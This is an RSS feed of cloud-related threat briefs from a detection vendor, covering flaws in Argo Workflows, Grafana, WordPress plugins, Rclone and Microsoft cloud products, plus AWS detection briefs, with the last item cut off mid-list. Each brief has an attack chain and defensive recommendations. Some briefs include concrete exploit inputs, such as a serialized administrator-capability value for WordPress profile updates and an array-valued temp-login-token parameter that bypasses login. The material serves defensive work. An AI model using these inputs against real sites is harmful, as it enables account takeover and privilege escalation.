<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Cloud — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/cloud/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 04 May 2026 20:11:01 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/cloud/feed.xml" rel="self" type="application/rss+xml"/><item><title>Argo Workflows Webhook Interceptor Vulnerable to Unauthenticated Memory Exhaustion (CVE-2026-42294)</title><link>https://feed.craftedsignal.io/briefs/2026-05-argo-dos/</link><pubDate>Mon, 04 May 2026 20:11:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-argo-dos/</guid><description>Argo Workflows is vulnerable to a denial-of-service (DoS) attack due to unbounded memory allocation in the Webhook Interceptor component.</description><content:encoded><![CDATA[<p>Argo Workflows is vulnerable to a denial-of-service (DoS) attack (CVE-2026-42294) due to unbounded memory allocation in the Webhook Interceptor. The vulnerability resides in the <code>server/auth/webhook/interceptor.go</code> component, specifically within the <code>/api/v1/events/</code> endpoint. This endpoint, intended for webhook integrations, reads the entire request body into memory without proper size limits, leading to potential memory exhaustion. An attacker can exploit this vulnerability by sending a crafted request with an extremely large body, causing the Argo Server to allocate excessive memory and potentially crash, resulting in a denial of service. Affected versions include Argo Workflows versions prior to 3.7.14 and versions 4.0.0 up to 4.0.5.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an Argo Workflows instance with a publicly accessible <code>/api/v1/events/</code> endpoint.</li>
<li>The attacker crafts an HTTP POST request targeting the <code>/api/v1/events/</code> endpoint.</li>
<li>The attacker sets the <code>Content-Length</code> header of the request to a very large value (e.g., 1GB or more).</li>
<li>The attacker sends the malicious request with a large amount of arbitrary data as the request body.</li>
<li>The Argo Server receives the request and, within the <code>WebhookInterceptor</code>, calls <code>io.ReadAll(r.Body)</code>, allocating memory to store the entire request body.</li>
<li>Due to the large request body, the Argo Server&rsquo;s memory consumption increases significantly.</li>
<li>If the attacker sends a sufficiently large request, the Argo Server exhausts its available memory.</li>
<li>The Argo Server process crashes due to an Out-Of-Memory (OOM) error, leading to a denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability results in a denial-of-service condition, disrupting workflow execution and API access for all users of the Argo Workflows instance. The Argo Server crashes, making it unavailable until restarted. This impacts service availability and potentially causes data loss if workflows are interrupted during execution. The number of victims depends on the number of Argo Workflows instances exposed and targeted by attackers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enforce a strict limit on webhook body size (e.g., 10MB) using <code>http.MaxBytesReader</code> or similar mechanisms within your ingress controller or reverse proxy to prevent oversized requests from reaching the Argo Server.</li>
<li>Upgrade Argo Workflows to version 3.7.14 or 4.0.5 or later to patch CVE-2026-42294 and mitigate the risk of denial-of-service attacks.</li>
<li>Monitor memory usage of the Argo Server process and set up alerts for unusually high memory consumption to detect potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>denial-of-service</category><category>argo-workflows</category><category>cloud</category></item><item><title>Grafana Multiple Vulnerabilities Leading to XSS and Information Disclosure</title><link>https://feed.craftedsignal.io/briefs/2026-05-grafana-vulns/</link><pubDate>Mon, 04 May 2026 09:54:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-grafana-vulns/</guid><description>Multiple vulnerabilities in Grafana allow a remote, anonymous attacker to conduct a Cross-Site Scripting attack or disclose information.</description><content:encoded><![CDATA[<p>Grafana is susceptible to multiple vulnerabilities that could allow unauthorized access and data compromise. A remote, anonymous attacker can exploit these weaknesses to perform Cross-Site Scripting (XSS) attacks or disclose sensitive information. This poses a risk to the confidentiality and integrity of Grafana instances and the data they manage. Defenders need to implement detection and mitigation measures to prevent potential exploitation. The specific Grafana versions affected are not specified in the advisory.</p>
<h2 id="attack-chain">Attack Chain</h2>
<p>Since the specific attack chain is not detailed in the source, a generic attack chain is provided based on common web application vulnerabilities:</p>
<ol>
<li>The attacker identifies a vulnerable Grafana instance accessible over the internet.</li>
<li>The attacker crafts a malicious HTTP request targeting a vulnerable endpoint in Grafana.</li>
<li>This request exploits a Cross-Site Scripting (XSS) vulnerability, injecting malicious JavaScript code.</li>
<li>Alternatively, the request exploits an information disclosure vulnerability to access sensitive data.</li>
<li>If XSS is successful, a user interacting with Grafana executes the injected JavaScript.</li>
<li>The malicious script can steal user credentials, session tokens, or other sensitive data.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to Grafana.</li>
<li>The attacker exfiltrates sensitive information or performs other malicious actions within the Grafana instance.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities can lead to the compromise of sensitive information, including user credentials, API keys, and internal system details. An attacker could leverage XSS to manipulate Grafana dashboards, inject malicious content, or redirect users to phishing sites. Information disclosure could expose sensitive configuration data or metrics, potentially leading to further attacks. The number of affected Grafana instances is currently unknown, but any publicly accessible instance is potentially at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Grafana Suspicious URI Activity</code> to detect potential exploitation attempts targeting Grafana instances via unusual URL patterns (log source: webserver).</li>
<li>Enable and review webserver logs for Grafana instances to identify suspicious activity, specifically cs-uri-query and cs-uri-stem (log source: webserver).</li>
<li>Implement a web application firewall (WAF) to filter out malicious requests and protect against common web application attacks, including XSS (log source: firewall).</li>
<li>Upgrade Grafana to the latest version as soon as security patches are available to address the identified vulnerabilities (affected_products: Grafana).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>grafana</category><category>xss</category><category>information-disclosure</category><category>cloud</category></item><item><title>WordPress Import and Export Users Plugin Privilege Escalation Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-wordpress-privesc/</link><pubDate>Sat, 02 May 2026 05:16:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-wordpress-privesc/</guid><description>A privilege escalation vulnerability exists in the Import and export users and customers plugin for WordPress (versions &lt;= 2.0.8) due to an incomplete blocklist allowing authenticated users to gain administrator privileges on subsites within a Multisite network.</description><content:encoded><![CDATA[<p>The Import and export users and customers plugin for WordPress, a plugin used to manage user data, is vulnerable to privilege escalation. This vulnerability, identified as CVE-2026-7641, affects all versions of the plugin up to and including 2.0.8. The vulnerability stems from an incomplete blocklist in the <code>save_extra_user_profile_fields()</code> function. This function fails to adequately filter meta keys for subsites within a WordPress Multisite network, allowing attackers to manipulate user roles. Successful exploitation allows authenticated attackers with Subscriber-level access or higher to escalate their privileges to Administrator on any subsite within the Multisite network. Exploitation requires the targeted WordPress instance to be part of a Multisite network and have specific settings enabled.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An administrator imports a CSV file containing multisite-prefixed capability column headers (e.g., <code>wp_2_capabilities</code>) using the affected plugin.</li>
<li>The administrator enables the &ldquo;Show fields in profile?&rdquo; option within the plugin settings. This action stores the imported column headers (including the multisite capabilities) in the <code>acui_columns</code> option.</li>
<li>A low-privileged user (e.g., Subscriber) authenticates to the WordPress subsite.</li>
<li>The attacker navigates to their user profile page (<code>/wp-admin/profile.php</code>). The plugin displays the previously imported multisite capability fields as editable options on the profile page.</li>
<li>The attacker crafts a profile update request, setting the value of the <code>wp_{subsite_id}_capabilities</code> meta key to <code>a:1:{s:13:&quot;administrator&quot;;b:1;}</code> which grants administrator privileges.</li>
<li>The attacker submits the crafted profile update to <code>/wp-admin/profile.php</code>.</li>
<li>The <code>save_extra_user_profile_fields()</code> function processes the update. Due to the incomplete blocklist, the function fails to prevent the modification of the <code>wp_{subsite_id}_capabilities</code> meta key.</li>
<li>The <code>update_user_meta()</code> function writes the attacker-controlled value directly to the user&rsquo;s metadata, granting them Administrator privileges on the specified subsite.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7641 allows an attacker to gain complete control over a WordPress subsite within a Multisite network. This can lead to unauthorized access to sensitive data, modification of website content, installation of malicious plugins or themes, and potential compromise of the entire Multisite network. Given the widespread use of WordPress and the Import and export users and customers plugin, a successful attack can have significant repercussions for affected organizations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Import and export users and customers plugin to the latest version to patch CVE-2026-7641.</li>
<li>Apply the Sigma rule <code>WordPress Multisite Privilege Escalation via Profile Update</code> to detect exploitation attempts against <code>/wp-admin/profile.php</code>.</li>
<li>Review the <code>acui_columns</code> option in the WordPress database to identify any instances where multisite-prefixed capability column headers have been imported, and remove those fields.</li>
<li>Monitor WordPress user profile updates for unusual modifications to user capabilities using the <code>WordPress User Role Change Detection</code> rule.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>privilege-escalation</category><category>wordpress</category><category>cloud</category></item><item><title>AWS SSM Session Manager Child Process Execution Abuse</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/</link><pubDate>Fri, 01 May 2026 20:57:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/</guid><description>Adversaries abuse AWS Systems Manager (SSM) Session Manager to gain remote execution and lateral movement within AWS environments by spawning malicious child processes from the SSM session worker, leveraging legitimate AWS credentials and IAM permissions.</description><content:encoded><![CDATA[<p>AWS Systems Manager (SSM) Session Manager provides interactive shell access to EC2 instances and hybrid nodes without the need for bastion hosts or open inbound ports. Attackers can abuse this functionality by leveraging compromised AWS credentials or IAM roles with <code>ssm:StartSession</code> permissions to gain unauthorized access to target systems. This allows for remote execution of commands and lateral movement within the AWS environment. The technique involves spawning child processes from the SSM session worker process to perform malicious activities. Defenders should monitor for unusual process execution patterns originating from SSM sessions to identify potential abuse.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains access to valid AWS credentials or IAM role with <code>ssm:StartSession</code> permissions.</li>
<li>Attacker initiates an SSM session to a target EC2 instance or hybrid node using the compromised credentials.</li>
<li>The <code>ssm-session-worker</code> process is started on the target instance to manage the interactive session.</li>
<li>Attacker executes commands within the session, spawning child processes from the <code>ssm-session-worker</code> process.</li>
<li>Attacker may use scripting languages such as PowerShell or Bash to execute malicious code (e.g., using <code>awsrunPowerShellScript</code> or <code>awsrunShellScript</code>).</li>
<li>These scripts perform reconnaissance, download additional tools, or attempt credential access.</li>
<li>Attacker moves laterally to other instances or resources within the AWS environment.</li>
<li>The ultimate objective is often data exfiltration, privilege escalation, or maintaining persistent access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to sensitive data, compromise of critical systems, and lateral movement within the AWS environment. The impact can range from data breaches to complete control of the compromised infrastructure. The number of affected systems depends on the scope of the compromised credentials and the attacker&rsquo;s ability to move laterally. Organizations using AWS SSM are at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious child processes spawned by <code>ssm-session-worker</code>.</li>
<li>Correlate process activity with AWS CloudTrail logs for <code>StartSession</code> and related API calls to identify the IAM principal initiating the session (see the overview section for API names).</li>
<li>Implement strict IAM policies and regularly review AWS credentials to minimize the risk of credential compromise.</li>
<li>Monitor <code>process.command_line</code>, <code>process.executable</code>, <code>process.user.name</code> for unusual activity within SSM sessions.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>aws</category><category>ssm</category><category>session-manager</category><category>execution</category><category>cloud</category></item><item><title>AWS EC2 Role GetCallerIdentity from New Source AS Organization</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-aws-ec2-role-getcalleridentity/</link><pubDate>Fri, 01 May 2026 20:57:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-aws-ec2-role-getcalleridentity/</guid><description>The rule detects when an EC2 instance role session calls AWS STS GetCallerIdentity from a new source autonomous system (AS) organization name, indicating potential credential theft and verification from outside expected egress paths.</description><content:encoded><![CDATA[<p>This detection identifies when an EC2 instance role session calls the AWS STS GetCallerIdentity API from a source Autonomous System (AS) Organization name that has not been previously observed. The GetCallerIdentity API is often used by adversaries to validate stolen instance role credentials from infrastructure outside the victim&rsquo;s normal egress points. By baselining the combination of identity and source network, the rule reduces noise associated with stable NAT or AWS-classified egress, focusing on truly novel access patterns. This detection is specifically designed to complement other rules that may detect general GetCallerIdentity calls, by excluding previously seen combinations of user identity and source AS organization.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to an EC2 instance through methods like exploiting a Server-Side Request Forgery (SSRF) vulnerability, compromising application code or exploiting IMDS abuse.</li>
<li>The attacker leverages the instance&rsquo;s IAM role to obtain temporary AWS credentials.</li>
<li>The attacker attempts to validate the stolen credentials using the <code>GetCallerIdentity</code> API call.</li>
<li>The <code>GetCallerIdentity</code> API call originates from an IP address associated with a new and unexpected Autonomous System Organization (ASO).</li>
<li>The AWS CloudTrail logs record the <code>GetCallerIdentity</code> event, including the user identity ARN and the source AS organization name.</li>
<li>The detection rule triggers due to the new combination of user identity and source AS organization.</li>
<li>The attacker uses the validated credentials to perform reconnaissance and identify valuable resources within the AWS environment (e.g., S3 buckets, databases).</li>
<li>The attacker attempts to exfiltrate sensitive data or deploy malicious workloads using the stolen credentials.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to unauthorized access to sensitive data stored within the AWS environment. The attacker may be able to escalate privileges, compromise other resources, and disrupt services. The potential impact includes data breaches, financial loss, and reputational damage. The lack of specific victim counts or sectors targeted suggests a broad applicability across various AWS users.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS EC2 Role GetCallerIdentity from New Source AS Organization&rdquo; to your SIEM to detect suspicious activity.</li>
<li>Investigate alerts triggered by the Sigma rule, focusing on the <code>aws.cloudtrail.user_identity.arn</code> and <code>source.as.organization.name</code> fields.</li>
<li>Monitor AWS CloudTrail logs for <code>GetCallerIdentity</code> API calls, particularly those originating from unfamiliar source IP addresses and ASNs.</li>
<li>Revoke compromised IAM role sessions by stopping the affected EC2 instances or removing the role from the instance profile.</li>
<li>Rotate any long-lived secrets accessible by the EC2 instance, based on the <code>aws.cloudtrail.user_identity.access_key_id</code>.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>getcalleridentity</category><category>ec2</category><category>discovery</category></item><item><title>AWS Discovery API Calls from VPN ASN by New Identity</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-vpn-discovery/</link><pubDate>Fri, 01 May 2026 20:57:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-vpn-discovery/</guid><description>This rule detects the initial use of AWS discovery APIs from VPN-associated ASNs by a previously unseen identity, indicating potential reconnaissance activity.</description><content:encoded><![CDATA[<p>This detection identifies the first-time occurrence of an IAM principal invoking discovery APIs from a source IP address associated with a known VPN autonomous system number (ASN). The rule focuses on high-signal discovery actions, such as credential checks, account enumeration, bucket inventory, compute inventory, and logging introspection within AWS CloudTrail logs. The goal is to detect potential reconnaissance activities originating from anonymizing networks, which may indicate malicious intent. The rule specifically omits broad <code>List*</code> and <code>Describe*</code> patterns to reduce false positives, focusing instead on a curated list of ASNs commonly associated with VPN providers and hosting services. It&rsquo;s important to validate ASN data using local intelligence and tailor the <code>event.action</code> list based on your environment&rsquo;s baseline. Hosting ASNs are dual-use and require careful monitoring.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to AWS credentials, possibly through compromised credentials or misconfigured IAM roles.</li>
<li>The attacker initiates a VPN connection to mask their origin and evade geographic restrictions or monitoring. The VPN endpoint&rsquo;s ASN belongs to a known VPN provider.</li>
<li>Using the compromised credentials and VPN connection, the attacker calls the AWS API to execute <code>GetCallerIdentity</code> to validate access.</li>
<li>The attacker enumerates IAM users and roles using <code>ListUsers</code> and <code>ListRoles</code> to map out the AWS environment&rsquo;s identity landscape.</li>
<li>The attacker inventories S3 buckets using <code>ListBuckets</code> to identify potential targets for data exfiltration or manipulation.</li>
<li>The attacker gathers information about EC2 instances, VPCs, and security groups using <code>DescribeInstances</code>, <code>DescribeVpcs</code>, and <code>DescribeSecurityGroups</code> to understand the network infrastructure.</li>
<li>The attacker lists available Lambda functions using <code>ListFunctions</code> to discover potential code execution opportunities.</li>
<li>The attacker collects logging configurations by calling <code>DescribeTrails</code> to identify logging gaps.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack leveraging these discovery techniques can lead to unauthorized access to sensitive data, privilege escalation, and lateral movement within the AWS environment. By mapping out the cloud infrastructure, attackers can identify vulnerabilities and misconfigurations to exploit. Compromised AWS environments can result in data breaches, service disruptions, and financial losses.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>AWS Discovery API Calls from VPN ASN by New Identity</code> to detect anomalous discovery activity originating from VPN ASNs.</li>
<li>Review the curated list of VPN-oriented ASNs within the rule query and update it with local intelligence from sources like RIPE, BGPView, or PeeringDB.</li>
<li>Enable AWS CloudTrail logs to capture the necessary event data for the Sigma rule to function effectively.</li>
<li>Tune the Sigma rule&rsquo;s <code>event.action</code> filter to include additional discovery-related API calls relevant to your environment, based on baseline analysis.</li>
<li>Investigate alerts generated by the Sigma rule by examining <code>aws.cloudtrail.user_identity.arn</code>, <code>event.action</code>, <code>event.provider</code>, <code>source.ip</code>, and <code>source.as.organization.name</code>.</li>
<li>Implement automated response actions, such as revoking sessions or rotating keys, when unexpected discovery activity is detected from VPN ASNs.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>discovery</category><category>vpn</category></item><item><title>AWS Discovery API Calls via CLI from a Single Resource</title><link>https://feed.craftedsignal.io/briefs/2024-11-aws-discovery-api-calls/</link><pubDate>Fri, 01 May 2026 19:43:38 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-11-aws-discovery-api-calls/</guid><description>This rule detects when a single AWS identity executes more than five unique discovery-related API calls (Describe*, List*, Get*, or Generate*) within a 10-second window using the AWS CLI, potentially indicating reconnaissance activity following credential compromise or compromised EC2 instance access.</description><content:encoded><![CDATA[<p>This detection rule identifies suspicious AWS reconnaissance activity originating from the AWS CLI. It triggers when a single AWS identity (IAM user, role, or service principal) makes more than five unique discovery-related API calls (such as <code>Describe*</code>, <code>List*</code>, <code>Get*</code>, or <code>Generate*</code>) within a 10-second window. The rule is designed to detect adversaries attempting to map out an AWS environment after gaining unauthorized access through compromised credentials or a compromised EC2 instance. The tool focuses on API calls related to key AWS services like EC2, IAM, S3, and KMS. This rule helps defenders identify and respond to early-stage reconnaissance activity, preventing further exploitation or data exfiltration. The rule excludes activity from AWS service accounts and the AWS Management Console, and it requires a minimum stack version of 9.2.0 with AWS integration version 4.6.0.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> An attacker gains access to an AWS environment, potentially through compromised credentials or by compromising an EC2 instance.</li>
<li><strong>Credential Usage:</strong> The attacker leverages the AWS CLI to interact with the AWS environment using the compromised credentials.</li>
<li><strong>Reconnaissance:</strong> The attacker initiates a series of discovery API calls to gather information about the AWS infrastructure. This includes using <code>Describe*</code>, <code>List*</code>, <code>Get*</code>, and <code>Generate*</code> commands.</li>
<li><strong>Resource Enumeration:</strong> The attacker enumerates various AWS resources, including EC2 instances, IAM roles, S3 buckets, and KMS keys, by querying their respective APIs.</li>
<li><strong>Target Identification:</strong> The attacker analyzes the gathered information to identify potential targets for further exploitation, such as vulnerable EC2 instances or misconfigured S3 buckets.</li>
<li><strong>Privilege Escalation (Optional):</strong> If the compromised credentials have limited permissions, the attacker might attempt to escalate privileges to gain broader access to the AWS environment.</li>
<li><strong>Lateral Movement (Optional):</strong> The attacker might attempt to move laterally to other AWS accounts or services to expand their reach and impact.</li>
<li><strong>Data Exfiltration/Impact:</strong> Based on the attacker&rsquo;s goals, they may attempt to exfiltrate sensitive data or cause disruption by modifying or deleting resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation could lead to unauthorized access to sensitive data, such as customer information, intellectual property, or financial records. The attacker could also disrupt business operations by modifying or deleting critical resources. Identifying and responding to such activity in a timely manner can help prevent significant damage and maintain the security and integrity of the AWS environment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the following Sigma rule to your SIEM and tune for your environment to detect the described reconnaissance activity.</li>
<li>Enable AWS CloudTrail logging for all AWS regions and accounts in your organization to ensure the required logs are available for detection.</li>
<li>Investigate any alerts generated by the Sigma rule, focusing on identifying the affected AWS identity, the source IP address, and the specific API calls made (as captured by the Sigma rule).</li>
<li>If suspicious activity is confirmed, follow AWS&rsquo;s incident-handling guidance, including disabling or rotating the access key used and restricting outbound connectivity from the source (reference the AWS Security Incident Response Guide).</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>cloudtrail</category><category>discovery</category></item><item><title>WordPress Temporary Login Plugin Authentication Bypass (CVE-2026-7567)</title><link>https://feed.craftedsignal.io/briefs/2024-01-wordpress-temp-login-auth-bypass/</link><pubDate>Fri, 01 May 2026 10:15:58 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-wordpress-temp-login-auth-bypass/</guid><description>The Temporary Login plugin for WordPress versions up to 1.0.0 is vulnerable to authentication bypass due to improper input validation, allowing unauthenticated attackers to log in as arbitrary temporary users by sending a specially crafted GET request.</description><content:encoded><![CDATA[<p>CVE-2026-7567 is an authentication bypass vulnerability that affects the Temporary Login plugin for WordPress, specifically versions up to and including 1.0.0. The vulnerability stems from a failure to properly validate the &rsquo;temp-login-token&rsquo; GET parameter within the <code>maybe_login_temporary_user()</code> function. By supplying an array as the value for this parameter, attackers can circumvent the intended <code>empty()</code> check. This leads to the <code>sanitize_key()</code> function returning an empty string, which is then used in a database query to fetch users. WordPress ignores empty <code>meta_value</code> parameters, causing the query to return all users with the <code>_temporary_login_token</code> meta key. Consequently, an unauthenticated attacker can effectively authenticate as any user with an active temporary login session by sending a single, maliciously crafted GET request. This poses a severe risk to website security, as it allows unauthorized access to user accounts and potentially sensitive data.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a WordPress site using the vulnerable Temporary Login plugin (version &lt;= 1.0.0).</li>
<li>The attacker crafts a malicious GET request targeting the WordPress site&rsquo;s login endpoint, including the &rsquo;temp-login-token&rsquo; parameter as an array (e.g., <code>temp-login-token[]=</code>).</li>
<li>The web server receives the GET request.</li>
<li>The <code>maybe_login_temporary_user()</code> function processes the request.</li>
<li>Due to improper input validation, the <code>empty()</code> check is bypassed when the &rsquo;temp-login-token&rsquo; parameter is an array.</li>
<li><code>sanitize_key()</code> processes the array and returns an empty string as the meta_value.</li>
<li>WordPress executes a database query using the empty meta_value, effectively retrieving all users with active temporary login tokens.</li>
<li>The attacker is granted unauthorized access to the account of a targeted temporary user, bypassing normal authentication procedures.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7567 allows unauthenticated attackers to bypass login restrictions and gain unauthorized access to WordPress user accounts utilizing the vulnerable Temporary Login plugin. The severity is high, as it allows complete compromise of user accounts without requiring any valid credentials. The impact includes potential data theft, account takeover, website defacement, and other malicious activities, depending on the privileges of the compromised user account.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the available patch or upgrade the Temporary Login plugin to a version greater than 1.0.0 to remediate CVE-2026-7567.</li>
<li>Deploy the Sigma rule <code>Detect WordPress Temporary Login Authentication Bypass Attempt</code> to detect exploitation attempts by monitoring HTTP requests with array-based <code>temp-login-token</code> parameters in the query string.</li>
<li>Implement input validation on the web server to reject requests containing array-based parameters where scalar strings are expected.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>authentication bypass</category><category>wordpress</category><category>plugin vulnerability</category><category>cve-2026-7567</category><category>cloud</category></item><item><title>Rclone Unauthenticated Remote Code Execution Vulnerabilities</title><link>https://feed.craftedsignal.io/briefs/2026-04-rclone-rce/</link><pubDate>Sat, 25 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-rclone-rce/</guid><description>Rclone versions prior to 1.73.5 are vulnerable to two critical unauthenticated remote code execution vulnerabilities (CVE-2026-41176 and CVE-2026-41179) when the remote control API is enabled without authentication, potentially allowing attackers to execute arbitrary commands and compromise the system.</description><content:encoded><![CDATA[<p>Two critical unauthenticated remote code execution vulnerabilities, CVE-2026-41176 and CVE-2026-41179, have been discovered in Rclone versions prior to 1.73.5. Rclone is a command-line program used to manage files on cloud storage services. These vulnerabilities can be exploited if the Rclone remote control (RC) API is enabled without proper authentication (e.g., <code>--rc-user/--rc-pass/--rc-htpasswd</code>). An attacker with network access to a vulnerable Rclone instance can bypass authentication, execute arbitrary commands, and potentially gain full system compromise. As organizations increasingly rely on cloud storage, vulnerabilities in tools like Rclone can have significant impact by enabling data theft and lateral movement. The vulnerabilities were reported on April 24, 2026, with no known active exploitation as of April 23, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a target system running Rclone with the RC API enabled.</li>
<li>The attacker verifies the RC API is exposed on a reachable network address (e.g., not only localhost) and is not protected by HTTP authentication.</li>
<li>For CVE-2026-41179, the attacker sends a single crafted HTTP request to the RC endpoint, leveraging the WebDAV backend initialization process.</li>
<li>This crafted request triggers the execution of arbitrary commands on the target system without authentication.</li>
<li>For CVE-2026-41176, the attacker bypasses authentication controls to access sensitive administrative functionality.</li>
<li>The attacker manipulates Rclone configuration or invokes operational RC methods to execute arbitrary commands.</li>
<li>The attacker gains local file read/write access, potentially stealing sensitive data or uploading malicious payloads.</li>
<li>The attacker achieves full system compromise, enabling data theft, lateral movement within the network, or denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-41176 and CVE-2026-41179 can lead to full system compromise, data theft, lateral movement, or denial of service. Specifically, attackers can achieve local file read, file write, or shell access, depending on the environment. The impact includes potential exposure of sensitive cloud data and configurations, which could compromise the integrity and confidentiality of stored information. Given Rclone&rsquo;s popularity among organizations managing cloud storage, a successful attack could affect a large number of victims across various sectors.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Rclone to version 1.73.5 or later to patch CVE-2026-41176 and CVE-2026-41179 as recommended by the vendor.</li>
<li>Enable global HTTP authentication on RC servers using <code>--rc-user</code>, <code>--rc-pass</code>, or <code>--rc-htpasswd</code> to mitigate the unauthenticated access, as mentioned in the description of the vulnerabilities.</li>
<li>Implement network-level controls (e.g., firewall rules) to restrict access to RC server endpoints and the RC service, as suggested by CCB.</li>
<li>Deploy the Sigma rule &ldquo;Detect Rclone RC API Access Without Authentication&rdquo; to identify potentially vulnerable Rclone instances within your environment.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>vulnerability</category><category>rce</category><category>cloud</category></item><item><title>Multiple Vulnerabilities in Microsoft Cloud Products Allow Privilege Escalation and Code Execution</title><link>https://feed.craftedsignal.io/briefs/2026-04-microsoft-cloud-vulns/</link><pubDate>Fri, 24 Apr 2026 09:09:09 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-microsoft-cloud-vulns/</guid><description>Multiple vulnerabilities in Microsoft Azure, Microsoft 365 Copilot, Microsoft Dynamics 365, and Microsoft Power Apps could allow an attacker to escalate privileges, execute arbitrary code, and conduct spoofing attacks.</description><content:encoded><![CDATA[<p>Multiple vulnerabilities have been reported affecting Microsoft Azure, Microsoft 365 Copilot, Microsoft Dynamics 365, and Microsoft Power Apps. Successful exploitation of these vulnerabilities could enable attackers to perform a variety of malicious actions, including escalating their privileges within the affected systems, executing arbitrary code to gain further control, and conducting spoofing attacks to deceive users or bypass security measures. The full details regarding specific vulnerability types and exploitation methods are currently unavailable, but the breadth of affected products indicates a potentially widespread impact across cloud-based Microsoft services. Defenders should prioritize monitoring for suspicious activity indicative of exploitation attempts targeting these services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<p>Since the advisory lacks specifics, we will describe a generalized attack chain based on the potential vulnerabilities:</p>
<ol>
<li><strong>Initial Access:</strong> The attacker gains initial access to a target environment, possibly through compromised credentials or a separate vulnerability.</li>
<li><strong>Privilege Escalation:</strong> The attacker exploits a vulnerability within one of the Microsoft cloud products (Azure, Microsoft 365 Copilot, Dynamics 365, or Power Apps) to elevate their privileges to a higher level, potentially gaining administrative rights.</li>
<li><strong>Code Injection:</strong> Leveraging the escalated privileges, the attacker injects malicious code into a vulnerable component of the cloud service.</li>
<li><strong>Code Execution:</strong> The injected code is executed, allowing the attacker to perform arbitrary actions within the context of the compromised service.</li>
<li><strong>Lateral Movement:</strong> The attacker uses the compromised service as a pivot point to move laterally within the cloud environment, targeting other resources and services.</li>
